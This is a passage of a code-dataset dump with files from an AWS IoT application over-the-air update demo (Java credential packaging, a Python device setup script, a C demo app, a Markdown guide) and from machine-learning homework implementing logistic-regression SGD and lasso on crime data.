= new PrintWriter(publicKeyPath);\n out.print(new String(key.openStream().readAllBytes()));\n out.close();\n\n log.info(String.format(\"the IoT device public key is generated at %s\", publicKeyPath));\n\n fileName = String.format(\"nw-app-ota-demo/%s.key\", PRV_KEY_NAME);\n key = getClass().getClassLoader().getResource(fileName);\n if (key == null)\n throw new IllegalArgumentException(String.format(\"private key file %s not found\", fileName));\n\n out = new PrintWriter(privateKeyPath);\n out.print(new String(key.openStream().readAllBytes()));\n out.close();\n\n log.info(String.format(\"the IoT device private key is generated at %s\", privateKeyPath));\n }\n\n private String prepareCredentials(String certId) throws IOException {\n String credentialsPath = String.format(\"%s/target/app-ota-demo/credentials\",\n 
System.getProperty(\"user.dir\"));\n\n File credentialsPathFile = new File(credentialsPath);\n FileUtils.deleteDirectory(credentialsPathFile);\n boolean ok = credentialsPathFile.mkdirs();\n if (!ok)\n throw new IOException(\n String.format(\"failed to create IoT device credentials directory at %s\", credentialsPath));\n\n String certFilePath = String.format(\"%s/cert.pem\", credentialsPath);\n String rootCaPath = String.format(\"%s/root-ca.crt\", credentialsPath);\n String publicKeyPath = String.format(\"%s/public.key\", credentialsPath);\n String privateKeyPath = String.format(\"%s/private.key\", credentialsPath);\n\n this.generateCredentials(certId, certFilePath, rootCaPath, publicKeyPath, privateKeyPath);\n\n List<String> srcFiles = Arrays.asList(certFilePath, rootCaPath, publicKeyPath, privateKeyPath);\n String zipFilePath = String.format(\"%s/%s\", credentialsPath, CREDENTIALS_FILE_NAME);\n FileOutputStream fos = new FileOutputStream(zipFilePath);\n ZipOutputStream zipOut = new ZipOutputStream(fos);\n\n for (String srcFile : srcFiles) {\n File fileToZip = new File(srcFile);\n FileInputStream fis = new FileInputStream(fileToZip);\n ZipEntry zipEntry = new ZipEntry(fileToZip.getName());\n zipOut.putNextEntry(zipEntry);\n\n byte[] bytes = new byte[1024];\n int length;\n while ((length = fis.read(bytes)) >= 0) {\n zipOut.write(bytes, 0, length);\n }\n fis.close();\n }\n\n zipOut.close();\n fos.close();\n\n log.info(String.format(\"the credentials package of the IoT device are prepared at %s\", zipFilePath));\n\n return zipFilePath;\n }\n\n private String prepareNightsWatchRangerPackage() throws IOException {\n String packageDstPath = String.format(\"%s/target/nightswatch-ranger\",\n System.getProperty(\"user.dir\"));\n\n File packageDstPathFile = new File(packageDstPath);\n FileUtils.deleteDirectory(packageDstPathFile);\n boolean ok = packageDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\n \"failed to create IoT device Night's Watch - Ranger package directory at %s\", packageDstPath));\n\n String packageDstFilePath = String.format(\"%s/%s\", packageDstPath, RANGER_PKG_FILE_NAME);\n\n String packageSrcFileName = String.format(\"nightswatch-ranger_x64/%s\", RANGER_PKG_FILE_NAME);\n URL packageSrc = getClass().getClassLoader().getResource(packageSrcFileName);\n if (packageSrc == null)\n throw new IllegalArgumentException(\n String.format(\"Night's Watch - Ranger package file %s not found\", packageSrcFileName));\n\n FileOutputStream out = new FileOutputStream(packageDstFilePath);\n out.write(packageSrc.openStream().readAllBytes());\n out.close();\n\n log.info(String.format(\n \"the Night's Watch - Ranger package of the IoT device are prepared at %s\", packageDstFilePath));\n\n return packageDstFilePath;\n }\n\n private String prepareSetupScript(String preSignedCredentialsPackageURL,\n String preSignedRangerPackageURL) throws IOException {\n String scriptDstPath = String.format(\"%s/target/app-ota-demo/setup-script\",\n System.getProperty(\"user.dir\"));\n\n File scriptDstPathFile = new File(scriptDstPath);\n FileUtils.deleteDirectory(scriptDstPathFile);\n boolean ok = scriptDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\n \"failed to create IoT device setup script directory at %s\", scriptDstPath));\n\n String scriptDstFilePath = String.format(\n \"%s/%s\", scriptDstPath, AppOTADemoDeviceStack.SETUP_SCRIPT_FILE_NAME);\n\n String scriptSrcFileName = String.format(\n \"nw-app-ota-demo/%s\", AppOTADemoDeviceStack.SETUP_SCRIPT_FILE_NAME);\n URL 
scriptSrc = getClass().getClassLoader().getResource(scriptSrcFileName);\n if (scriptSrc == null)\n throw new IllegalArgumentException(\n String.format(\"setup script file %s not found\", scriptSrcFileName));\n\n String script = new String(scriptSrc.openStream().readAllBytes());\n\n script = script.replace(\"<CREDENTIALS_PACKAGE_URL>\", preSignedCredentialsPackageURL);\n script = script.replace(\"<NW_RANGER_PACKAGE_URL>\", preSignedRangerPackageURL);\n\n PrintWriter out = new PrintWriter(scriptDstFilePath);\n out.print(script);\n out.close();\n\n log.info(String.format(\"setup script of the IoT device is prepared at %s\", scriptDstFilePath));\n\n return scriptDstFilePath;\n }\n\n private void deactivateThingCert(String certId) {\n AWSIot iotClient = AWSIotClientBuilder.defaultClient();\n log.debug(\"connected to AWS IoT service\");\n\n // Deactivate the device certificate\n // CLI: aws iot update-certificate --new-status INACTIVE --certificate-id <certificate_id>\n UpdateCertificateRequest req = new UpdateCertificateRequest();\n req.setCertificateId(certId);\n req.setNewStatus(\"INACTIVE\");\n iotClient.updateCertificate(req);\n\n log.info(String.format(\"the certificate %s is deactivated\", certId));\n }\n\n private void deleteJobs() {\n // delete any existing jobs that might be related to the thing\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V1_DEPLOY_JOB_ID);\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V2_DEPLOY_JOB_ID);\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V1_DESTROY_JOB_ID);\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V2_DESTROY_JOB_ID);\n }\n}\n"
},
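The `prepareCredentials` method above packages the device certificate, root CA, and key files with a manual `ZipOutputStream` read/write loop. A minimal Python sketch of the same packaging step using the standard-library `zipfile` module; the function name is hypothetical and the file names are the ones the method generates:

```python
import os
import zipfile

def zip_credentials(zip_path, src_files):
    # write each credential file into the archive under its base name,
    # mirroring the ZipOutputStream loop in prepareCredentials above
    with zipfile.ZipFile(zip_path, "w") as zf:
        for src in src_files:
            zf.write(src, arcname=os.path.basename(src))

# e.g. zip_credentials("credentials.zip",
#                      ["cert.pem", "root-ca.crt", "public.key", "private.key"])
```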
{
"alpha_fraction": 0.6622922420501709,
"alphanum_fraction": 0.6710411310195923,
"avg_line_length": 25.581396102905273,
"blob_id": "62418747999b7b11314ea2e82c190d7b1f922181",
"content_id": "78323a0199d9827e25e2140f529a1e26ad2bebd7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1143,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 43,
"path": "/src/main/resources/nw-app-ota-demo/setup.py",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\n\n# both two will be injected by Night's Watch - Builder, DON\"T edit manually.\ncredentials_pkg_url = \"<CREDENTIALS_PACKAGE_URL>\"\nnw_ranger_pkg_url = \"<NW_RANGER_PACKAGE_URL>\"\n\n# step1, download asset\n\ncredentials_pkg_path = \"/tmp/credentials.zip\"\nnw_ranger_pkg_path = \"/tmp/nightswatch-ranger.tar.gz\"\nnw_ranger_home = \"/opt/nightswatch-ranger\"\n\n# download device root CA, certificates and keys\nrc = os.system(\"curl -o %s -fs '%s'\" % (credentials_pkg_path, credentials_pkg_url))\nif 0 != rc:\n sys.exit(rc)\n\n# download Night's Watch - Ranger package\nrc = os.system(\"curl -o %s -fs '%s'\" % (nw_ranger_pkg_path, nw_ranger_pkg_url))\nif 0 != rc:\n sys.exit(rc)\n\n# step2, install asset\n\n# un-package Night's Watch - Ranger package\nrc = os.system(\"tar zxf %s --no-same-owner -C /opt\" % nw_ranger_pkg_path)\nif 0 != rc:\n sys.exit(rc)\n\n# copy device root CA, certificates and keys\nrc = os.system(\"unzip -o %s -d %s/certs/p1\" % (credentials_pkg_path, nw_ranger_home))\nif 0 != rc:\n sys.exit(rc)\n\n# step3, launch Ranger daemon\n\nbin = \"%s/ranger\" % nw_ranger_home\nos.execl(bin, bin)\n"
},
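The setup script above chains `os.system` calls and checks each return code by hand. A sketch of the same download-and-install steps with `subprocess.run(..., check=True)`, which raises `CalledProcessError` on any non-zero exit; the URL values are the same placeholders that Night's Watch - Builder injects:

```python
import subprocess

credentials_pkg_url = "<CREDENTIALS_PACKAGE_URL>"  # injected placeholder, as above
nw_ranger_pkg_url = "<NW_RANGER_PACKAGE_URL>"      # injected placeholder, as above
credentials_pkg_path = "/tmp/credentials.zip"
nw_ranger_pkg_path = "/tmp/nightswatch-ranger.tar.gz"
nw_ranger_home = "/opt/nightswatch-ranger"

# each call raises subprocess.CalledProcessError on failure, replacing
# the repeated "if 0 != rc: sys.exit(rc)" blocks in the script above
subprocess.run(["curl", "-o", credentials_pkg_path, "-fs", credentials_pkg_url], check=True)
subprocess.run(["curl", "-o", nw_ranger_pkg_path, "-fs", nw_ranger_pkg_url], check=True)
subprocess.run(["tar", "zxf", nw_ranger_pkg_path, "--no-same-owner", "-C", "/opt"], check=True)
subprocess.run(["unzip", "-o", credentials_pkg_path, "-d", f"{nw_ranger_home}/certs/p1"], check=True)
```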
{
"alpha_fraction": 0.5490887761116028,
"alphanum_fraction": 0.5737801194190979,
"avg_line_length": 24.75757598876953,
"blob_id": "4c059c0a94eb1cac30f213db77c879b9625dc66f",
"content_id": "5fedcf8dddb414c6ddcb99228fbef8d32508660e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1701,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 66,
"path": "/demo/app_xxx_src/app_xxx.c",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "#include <signal.h>\n#include <sys/socket.h>\n#include <linux/limits.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <netdb.h>\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <errno.h>\n#include <arpa/inet.h> \n\n\nvoid sig_handler(int signo)\n{\n exit(0);\n}\n\nint main(int argc, char *argv[])\n{\n int sockfd = 0, n = 0, app_name_l = 0, topic_l = 0;\n char app_name[PATH_MAX + 1], topic[PATH_MAX + 50];\n struct sockaddr_in serv_addr; \n// char *data = \"{\\\"payload\\\": \\\"*,*,red\\\"}\\n\",\n char *data = \"*,*,red\\n\",\n *log = \"LOG: send data to IoT Core successfully.\\n\",\n conn_err[256], sock_err[256];\n\n// signal(SIGINT, sig_handler);\n\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\n if (-1 == sockfd) {\n snprintf(sock_err, 256, \"LOG: failed to create socket fd: %d.\\n\", errno);\n write(2, sock_err, strlen(sock_err));\n return 1;\n }\n\n memset(&serv_addr, '\\0', sizeof(serv_addr)); \n\n serv_addr.sin_family = AF_INET;\n serv_addr.sin_port = htons(9000); \n\n inet_pton(AF_INET, argv[1], &serv_addr.sin_addr);\n\n if (-1 == connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))) {\n snprintf(conn_err, 256, \"LOG: failed to connect to IPC server: %d.\\n\", errno);\n write(2, conn_err, strlen(conn_err));\n return 1;\n }\n\n app_name_l = snprintf(app_name, PATH_MAX + 1, \"%s\\n\", argv[2]);\n write(sockfd, app_name, app_name_l);\n\n topic_l = snprintf(topic, PATH_MAX + 50, \"%s\\n\", argv[3]);\n write(sockfd, topic, topic_l);\n\n while (1)\n {\n write(sockfd, data, strlen(data));\n write(1, log, strlen(log));\n sleep(5);\n } \n\n return 0;\n}\n\n"
},
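`app_xxx.c` above talks to the Ranger IPC server with a simple line protocol: connect to port 9000, send the app name and topic as newline-terminated lines, then stream payload lines every five seconds. A hedged Python sketch of the same client; the protocol details are inferred from the C source, and `run_client` is a hypothetical name:

```python
import socket
import time

def run_client(server_ip, app_name, topic):
    # same wire protocol as app_xxx.c: app name line, topic line, then payloads
    with socket.create_connection((server_ip, 9000)) as sock:
        sock.sendall(f"{app_name}\n".encode())
        sock.sendall(f"{topic}\n".encode())
        while True:
            sock.sendall(b"*,*,red\n")  # the payload the demo app sends
            print("LOG: send data to IoT Core successfully.")
            time.sleep(5)

# e.g. run_client("127.0.0.1", "app_xxx", "/qbr/demo/lcd")
```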
{
"alpha_fraction": 0.7354457378387451,
"alphanum_fraction": 0.7471194863319397,
"avg_line_length": 62.42307662963867,
"blob_id": "bec89f9f503fdafe50cbf015ef41c3b8e0939f0a",
"content_id": "601cefa6203d0af3b69d10616c9f07ce578cebdf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6596,
"license_type": "permissive",
"max_line_length": 343,
"num_lines": 104,
"path": "/demo/app-ota.md",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "This document means to give you a guide to produce an easy-to-show demonstration about application OTA based on Night's Watch project.\n\n## 0. Pre-condition\n\n1. Match the requirements listed in README [limit](http://git.awsrun.com/rp/nightswatch-builder#limit) section.\n2. You need a local laptop/PC as the client to run AWS CLI command with your AWS credentials as well as certain rights.\n3. You need a local laptop/PC as the client to run Night's Watch - Build program with your AWS credentials as well as certain rights.\n\n>>**Note:**\n>>\n>> Night's Watch - Build does not require user input any AWS credentials, instead, the default configuration and credentials will be loaded from ``~/.aws/config`` and ``~/.aws/credentials`` automatically, , you can configure them by command ``aws configure``.\n\n## 1. Deploy IoT core stack\n\n>>**Note:**\n>>\n>> All `cdk` and `java` command listed in this guide need you to change current working directory to Night's Watch - Builder code repository directory first.\n\n- Cleanup last context of CDK\n\n - ``cdk context --clear``\n\n- Provision IoT core stack\n\n - ``cdk deploy nightswatch-app-ota-demo-iot``\n\n- Prepare Night's Watch - Ranger package\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo service-endpoint``\n - You will get `IoT service endpoint` output by above step, update `AWS_IOT_MQTT_HOST` value in [`aws_iot_config.h`](http://git.awsrun.com/rp/nightswatch-ranger/blob/master/aws_iot_config.h#L15) in Night's Watch - Ranger code repository follow [this step](http://git.awsrun.com/rp/nightswatch-ranger#device-client-parameter-configuration).\n - Build Night's Watch - Ranger follow [this step](http://git.awsrun.com/rp/nightswatch-ranger#basic) on a x64 architecture host.\n - Organize Night's Watch - Ranger deployment directory by [this step](http://git.awsrun.com/rp/nightswatch-ranger#deployment-directory-structure). Note, you need to name the deployment directory `<NIGHTS_WATCH_RANGER_HOME_DIR>` to `nightswatch-ranger`.\n - Package Night's Watch - Ranger deployment by command ``tar czf nightswatch-ranger.tar.gz nightswatch-ranger``.\n - Save the tar ball to `src/main/resources/nightswatch-ranger_x64` directory.\n\n- Re-build Night's Watch - Builder to update inline resource\n\n - ``mvn package``\n\n- Prepare demo asset\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-asset``\n\n## 2. 
Create fake IoT device for demo if you have no an own device (optional)\n\n>>**Note:**\n>>\n>> You need an IoT thing to act the device to deploy the application and demo the OTA operation via Night's Watch - Ranger daemon program.\n>>\n>> Skip this step if you have a real one, you can get certificates and credentials in the S3 bucket (the bucket name is provided by output `nightswatch-app-ota-demo-iot.devfilesbucketname` after the stack deployment), then deploy and run Night's Watch - Ranger by yourself.\n>>\n>> If you do not have a x64 architecture device (current built-in demo application and containerization facility is x64 architecture), you can follow this step to deploy an EC2 instance to act the IoT device easily, Night's Watch - Builder will automatically deploy and configure Ranger for you.\n\n- ``cdk deploy nightswatch-app-ota-demo-dev [-c ec2-key-name=<key-pair-name>] [-c ec2-image-id=<ec2-image-id>]``\n\n - Use `ec2-image-id` optional parameter in above command to provide AMI ID to provision EC2 instance using an Ubuntu 18.04lts x64 operation system in your region, e.g. ID `ami-0cd744adeca97abb1` can be used for region `ap-northeast-1`. CDK will lookup an Amazon official AMI contains Ubuntu 18.04lts x64 for your by default.\n - Use `key-pair-name` optional parameter in above command to provide SSH key pair name to inject the public key to the EC2 instance, if you would like to use `ssh` login it, to debug or check log for example.\n\n## 3. Execute Application deployment and update job\n\n- For containerized application deployment and update:\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-app-v1``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 1.\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-app-v2``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 2.\n\n- For non-containerized application deployment and update:\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-native-app-v1``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 1.\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-native-app-v2``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. 
This job is used to deploy application version 2.\n\n>>**The different between application version 1 and 2:**\n>>\n>> Application version 1 outputs data `*,*,red` to the MQTT topic `/qbr/demo/lcd` periodically.\n>>\n>> Application version 2 outputs data `*,*,yello` to the MQTT topic `/qbr/demo/lcd` periodically.\n>>\n>> Additional, you can subscribe the MQTT topic `nw/apps/app_xxx/event` and `nw/apps/app_xxx/log` to monitor application's common resource usage indicators and `stdout` `stderr` outputs.\n>\n>>**Application source code:**\n>>\n>> As the attachment for you reference, the source code have been updated to [here](http://git.awsrun.com/rp/nightswatch-builder/blob/master/demo/app_xxx_src).\n>> The `rootfs` of the container is not included.\n>\n>>**Note:**\n>>\n>> You can use follow commands to describe application deployment and update progress in detail:\n>> - ``aws iot describe-job-execution --job-id nw-app-ota-demo-deploy-app-v1 --thing-name nw-app-ota-demo-dev``\n>> - ``aws iot describe-job-execution --job-id nw-app-ota-demo-deploy-app-v2 --thing-name nw-app-ota-demo-dev``\n\n## -3. Clean demo asset up\n\n- ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo cleanup-asset``\n\n## -2. Delete demo IoT device if you created in step \\#2\n\n- ``cdk destroy nightswatch-app-ota-demo-dev``\n\n## -1. Destroy IoT core stack\n\n- ``cdk destroy nightswatch-app-ota-demo-iot``\n"
}
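The guide above suggests subscribing to `nw/apps/app_xxx/event` and `nw/apps/app_xxx/log` to monitor the deployed application. A sketch of such a monitor with the `paho-mqtt` client; the endpoint placeholder and the credential file names (matching the files unpacked to `certs/p1` earlier) are assumptions you must adapt:

```python
import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    print(msg.topic, msg.payload.decode(errors="replace"))

# paho-mqtt 1.x style constructor; 2.x requires
# mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
client = mqtt.Client()
# mutual-TLS credentials downloaded for the demo device (names are assumptions)
client.tls_set(ca_certs="root-ca.crt", certfile="cert.pem", keyfile="private.key")
client.on_message = on_message
client.connect("<your-iot-endpoint>", 8883)  # the IoT service endpoint from step 1
client.subscribe([("nw/apps/app_xxx/event", 0), ("nw/apps/app_xxx/log", 0)])
client.loop_forever()
```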
] | 7 |
feipenghe/ml_hw | https://github.com/feipenghe/ml_hw | ddfab6d2ada65610dff34eef2a2a225446888d6b | 77acc66edb845a46d833424d4930cedfa5a08324 | 2a9ff4354c158a0f5b58dc27e70174a9f15ecb72 | refs/heads/master | 2022-12-24T07:58:53.790642 | 2020-10-01T20:47:19 | 2020-10-01T20:47:19 | 300,409,806 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6086474657058716,
"alphanum_fraction": 0.6330376863479614,
"avg_line_length": 33.464969635009766,
"blob_id": "c52be04ef537abfb2f9b5e2f16bd6a4f3a607284",
"content_id": "ca8d23ab9daa18975569ec1b601f532f300a240e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5412,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 157,
"path": "/CSE546hw2/binary_logistic_reg_SGD.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom mnist import MNIST\nimport numpy as np\ndef load_dataset():\n mndata = MNIST(\"./data/python-mnist/data/\")\n \n X_train, labels_train = map(np.array, mndata.load_training())\n kept_entries_pos1 = (labels_train == 2) + (labels_train == 7)\n X_train = X_train[kept_entries_pos1]\n labels_train = labels_train[kept_entries_pos1]\n labels_train = labels_train.astype(int)\n labels_train[labels_train == 7] = 1\n labels_train[labels_train == 2] = -1\n\n \n \n X_test, labels_test = map(np.array, mndata.load_testing())\n kept_entries_pos2 = (labels_test == 2) + (labels_test == 7)\n X_test = X_test[kept_entries_pos2]\n labels_test = labels_test[kept_entries_pos2]\n labels_test = labels_test.astype(int)\n labels_test[labels_test == 7] = 1\n labels_test[labels_test == 2] = -1\n # normalization to [0,1]\n X_train = X_train/255.0 \n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\nX_train, labels_train, X_test, labels_test = load_dataset()\n\n\n# In[2]:\n\n\ndef SGD(X_train, labels_train, X_test, labels_test, batch_size = 100, learning_rate = 0.001, stop_b = 1e-4, stop_w= 1e-4):\n\n ##### import math\n n, d= X_train.shape\n\n m = X_test.shape[0]\n\n # w = np.zeros(d)\n new_w = np.zeros(d)\n w_gradient = np.zeros(d)\n # b = 0\n new_b = 0\n b_gradient = 0\n# learning_rate = 0.001\n\n reg_lambda = 1 \n reg_lambda = reg_lambda * (batch_size/n)\n loss_on_training = []\n loss_on_testing = []\n\n loss_sum = 0\n\n misclass_on_training = []\n misclass_on_testing = []\n\n\n\n # TODO: while not converge\n count = 0\n metStopCondition = False\n# batch_size = 1\n while not metStopCondition:\n\n w = np.copy(new_w)\n b = np.copy(new_b)\n\n idx = np.random.randint(0, n, batch_size)\n X_train_batch = X_train[idx]\n labels_train_batch = labels_train[idx]\n\n y_pred = b + X_train_batch.dot(w)\n u = 1/(1+ np.exp(-labels_train_batch*(y_pred)))\n w_gradient = (1/batch_size)*np.sum((1-u)*(-labels_train_batch*X_train_batch.T), axis = 1) + 2*reg_lambda*w\n\n b_gradient = (1/batch_size)*np.sum((1-u)*(-labels_train_batch))\n\n # gradient descent update on the whole dataset, therefore we don't have to update each step\n new_w -= w_gradient * learning_rate\n new_b -= b_gradient * learning_rate\n\n training_loss = (1/n) * np.sum( np.log(1+ np.exp(-labels_train*(b+X_train.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_training.append(training_loss)\n testing_loss = (1/m) * np.sum( np.log(1+ np.exp(-labels_test*(b+X_test.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_testing.append(testing_loss)\n\n num_incor_class_training = np.sum( labels_train !=( np.sign(b+ X_train.dot(w) ) ) ) \n num_incor_class_testing = np.sum( labels_test != ( np.sign(b + X_test.dot(w) ) ))\n# print(\"num_incor_class_training: \", num_incor_class_training)\n misclass_on_training.append( num_incor_class_training /n )\n misclass_on_testing.append(num_incor_class_testing/m)\n # print(new_w)\n # print(w)\n # break\n # print(\"new_b - b: \", type(new_b - b))\n # Stop condition check\n # 1e-7 2.5e-7\n metStopCondition = np.absolute(new_b - b) < stop_b and np.linalg.norm(new_w - w, 2) < stop_w\n# print(\"new_b - b\", new_b - b)\n# print(\"np.linalg.norm(new_w - w, 2) \", np.linalg.norm(new_w - w, 2) )\n# print(\"loss: \", loss_on_training[-1])\n return loss_on_training, loss_on_testing, misclass_on_training, misclass_on_testing\n\n\n# In[3]:\n\n\nloss_on_training1, loss_on_testing1, misclass_on_training1, misclass_on_testing1 = SGD(X_train, 
labels_train, X_test, labels_test, batch_size = 1,stop_b =6e-4 , stop_w = 2.5e-3)\n\nfrom matplotlib import pyplot as plt\n\nplt.plot(range(len(loss_on_training1)), loss_on_training1, label = \"training loss\")\nplt.plot(range(len(loss_on_training1)), loss_on_testing1,label = \"testing loss\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"loss\")\nplt.legend()\n# plt.show()\nplt.savefig(\"A6c(i)\")\nplt.show()\n\nplt.plot(range( len(misclass_on_training1)-1), misclass_on_training1[1:], label = \"misclassification rate on training dataset\")\nplt.plot(range(len(misclass_on_training1)-1), misclass_on_testing1[1:], label = \"misclassification rate on test dataset\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"misclassification rate\")\nplt.legend()\nplt.savefig(\"A6c(ii)\")\nplt.show()\n\n\n# In[4]:\n\n\nloss_on_training2, loss_on_testing2, misclass_on_training2, misclass_on_testing2 = SGD(X_train, labels_train, X_test, labels_test, batch_size = 100, learning_rate = 0.01,stop_b =1e-4 , stop_w = 4e-3)\n\nplt.plot(range(len(loss_on_training2)), loss_on_training2, label = \"training loss\")\nplt.plot(range(len(loss_on_training2)), loss_on_testing2,label = \"testing loss\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"loss\")\nplt.legend()\n# plt.show()\nplt.savefig(\"A6d(i)\")\nplt.show()\n\nplt.plot(range( len(misclass_on_training2)-1), misclass_on_training2[1:], label = \"misclassification rate on training dataset\")\nplt.plot(range(len(misclass_on_training2)-1), misclass_on_testing2[1:], label = \"misclassification rate on test dataset\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"misclassification rate\")\nplt.legend()\nplt.savefig(\"A6d(ii)\")\nplt.show()\n\n"
},
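The hand-derived gradient in the script above (the `(1-u)` factor and the label signs) is easy to get wrong, so a finite-difference check is a useful sanity test. A small sketch on toy data, using the squared-norm regularizer `lam * ||w||^2` that the `2*reg_lambda*w` gradient step above implies; all names here are local to the sketch:

```python
import numpy as np

def loss(w, b, X, y, lam):
    # regularized logistic loss matching the gradient used in the script above
    return np.mean(np.log1p(np.exp(-y * (b + X.dot(w))))) + lam * w.dot(w)

def grad_w(w, b, X, y, lam):
    u = 1.0 / (1.0 + np.exp(-y * (b + X.dot(w))))
    return np.mean((1 - u)[:, None] * (-y[:, None] * X), axis=0) + 2 * lam * w

rng = np.random.default_rng(0)
X, y = rng.normal(size=(50, 5)), np.sign(rng.normal(size=50))
w, b, lam, eps = rng.normal(size=5), 0.1, 0.05, 1e-6

# central finite differences along each coordinate of w
num = np.array([(loss(w + eps * np.eye(5)[k], b, X, y, lam)
                 - loss(w - eps * np.eye(5)[k], b, X, y, lam)) / (2 * eps)
                for k in range(5)])
print(np.max(np.abs(num - grad_w(w, b, X, y, lam))))  # should be ~1e-9
```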
{
"alpha_fraction": 0.5818120837211609,
"alphanum_fraction": 0.6009043455123901,
"avg_line_length": 24.95652198791504,
"blob_id": "f18bd9db5497244c5cc829c5a695fd582271620a",
"content_id": "ca7155f892f83110929ae07ab56c3840ec5a7937",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5971,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 230,
"path": "/CSE546hw2/lasso_application.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[65]:\n\n\nimport numpy as np\ntrain_f = \"data/crime-train.txt\"\ntest_f = \"data/crime-test.txt\"\ndef txt2arr(file_name):\n var_d = dict()\n with open(file_name) as f:\n arr = []\n lines = f.readlines()\n variables = lines[0].split(\"\\t\")\n for i in range(len(variables)):\n var_d[variables[i]] = i\n\n for l in lines[1:]:\n l = l.strip()\n arr.append([float(s) for s in l.split(\"\\t\")])\n return np.array(arr), var_d\ntraining_data, var_d = txt2arr(train_f) \ntesting_data, _ = txt2arr(test_f)\n\ntrain_x = training_data[:, 1:]\ntrain_y = training_data[:, 0]\n\ntest_x = testing_data[:, 1:]\ntest_y = testing_data[:, 0]\nprint(train_y.shape)\nprint(train_x.shape)\n\n\n# In[26]:\n\n\nvar_d\n\n\n# In[25]:\n\n\nprint(train_y)\n\n\n# In[69]:\n\n\nn, d = train_x.shape\nm, _ = test_x.shape\nw = np.zeros(d)\n\n\n# In[71]:\n\n\n\n\n# TODO: regularization path\n# it updates values column by column and each time use all data\nimport sys\n\nreg_lambda_l = []\n\nfor k in range(d):\n reg_lambda = 2*np.abs(np.sum(train_x[:,k] *(train_y-np.average(train_y)) ,axis=0))\n reg_lambda_l.append(reg_lambda)\nreg_lambda = max(reg_lambda_l)\n\nreg_lambda0 = reg_lambda\nprint(\"max_lambda: \", reg_lambda)\n\n# initialize lambda\nnum_nonzero_l = []\nreg_lambda_l = []\nreg_lambda_l.append(reg_lambda)\n\nobjective_val_l = []\n\n\n\nw_updates = [np.zeros(d)] # initialize how much w_updates\nw = w_updates[0]\nsquared_train_err_l = [np.sum( (train_x.dot(w) + b - train_y)**2 )/n]\nsquared_test_err_l = [np.sum( (test_x.dot(w) + b - test_y)**2 )/m]\n# w_prev = np.zeros(d)\nb_l = [(1/n)*np.sum( train_y - train_x.dot(w))]\n\nsolution_weights = [np.zeros(d)]\n\n\n\n\nwhile reg_lambda > 1e-2: # TODO\n max_update = sys.maxsize\n # initialize weight with solution of lambda_max\n if reg_lambda == reg_lambda0:\n w_prev = np.zeros(d)\n else:\n w_prev = w_updates[1]\n w = w_prev\n b = b_l[-1]\n\n while max_update >= 0.01: # condition for not converge\n # pre-compute a\n # as a is fixed and solely depends on X\n a = 2*np.sum(train_x**2, axis = 0) # axis = 0 by default\n # print(a.shape)\n for k in range(d):\n excluded_train_x = np.delete(train_x, k, axis = 1)\n excluded_w = np.delete(w, k)\n # calculate the cost\n c_k = 2*np.sum(train_x[:,k]*(train_y- (b+ excluded_train_x.dot(excluded_w)) ) )\n # update weights\n if c_k < -reg_lambda:\n w[k]= (c_k+reg_lambda)/a[k]\n 